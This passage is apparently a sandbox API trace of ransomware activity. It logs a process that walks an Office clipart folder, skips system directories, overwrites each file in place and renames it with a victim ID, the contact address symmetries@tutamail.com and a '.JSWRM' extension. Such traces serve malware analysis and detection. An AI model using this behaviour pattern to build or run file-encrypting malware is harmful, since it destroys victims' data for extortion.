1 [0075.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.955] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49546) returned 1 [0075.955] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc180) returned 0x24c1d0 [0075.955] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc180, lpOverlapped=0x0) returned 1 [0075.959] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.959] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc180, lpOverlapped=0x0) returned 1 [0075.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.960] CloseHandle (hObject=0x460) returned 1 [0075.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0075.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0075.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0075.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0075.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0075.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0075.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.961] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CUP.WMF", cAlternateFileName="")) returned 1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2=".") returned 1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="..") returned 1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="...") returned 1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="windows") returned -1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="recovery") returned -1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="perflogs") returned -1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="documents and settings") returned -1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="system volume information") returned -1 [0075.961] lstrcmpiW (lpString1="CUP.WMF", lpString2="msocache") returned -1 [0075.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUP.WMF", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUP.WMF", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUP.WMF", lpUsedDefaultChar=0x0) returned 7 [0075.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUP.WMF", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUP.WMF", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUP.WMF", lpUsedDefaultChar=0x0) returned 7 [0075.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0075.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0075.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.962] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2966) returned 1 [0075.962] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb90) returned 0x24c1d0 [0075.962] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb90, lpOverlapped=0x0) returned 1 [0075.963] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.963] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb90, lpOverlapped=0x0) returned 1 [0075.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.964] CloseHandle (hObject=0x460) returned 1 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0075.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0075.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0075.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0075.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0075.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.964] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0075.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0075.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0075.965] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CUPINST.WMF", cAlternateFileName="")) returned 1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2=".") returned 1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="..") returned 1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="...") returned 1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="windows") returned -1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="recovery") returned -1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="perflogs") returned -1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="documents and settings") returned -1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="system volume information") returned -1 [0075.965] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="msocache") returned -1 [0075.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUPINST.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUPINST.WMF", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUPINST.WMF", lpUsedDefaultChar=0x0) returned 11 [0075.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0075.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUPINST.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUPINST.WMF", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUPINST.WMF", lpUsedDefaultChar=0x0) returned 11 [0075.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0075.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0075.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.966] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10326) returned 1 [0075.966] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2850) returned 0x24c1d0 [0075.966] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2850, lpOverlapped=0x0) returned 1 [0075.968] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.968] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2850, lpOverlapped=0x0) returned 1 [0075.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.968] CloseHandle (hObject=0x460) returned 1 [0075.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0075.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0075.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0075.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0075.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0075.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.969] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0075.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.969] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7992, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00117_.WMF", cAlternateFileName="")) returned 1 [0075.969] lstrcmpiW (lpString1="DD00117_.WMF", lpString2=".") returned 1 [0075.969] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="..") returned 1 [0075.969] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="...") returned 1 [0075.969] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="windows") returned -1 [0075.969] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="recovery") returned -1 [0075.969] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="perflogs") returned -1 [0075.970] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="documents and settings") returned -1 [0075.970] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.970] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="system volume information") returned -1 [0075.970] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="msocache") returned -1 [0075.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00117_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00117_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00117_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0075.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00117_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00117_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00117_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0075.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.970] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31122) returned 1 [0075.970] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7990) returned 0x24c1d0 [0075.970] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x7990, lpOverlapped=0x0) returned 1 [0075.974] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.974] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x7990, lpOverlapped=0x0) returned 1 [0075.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.974] CloseHandle (hObject=0x460) returned 1 [0075.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.974] MultiByteToWideChar (in: 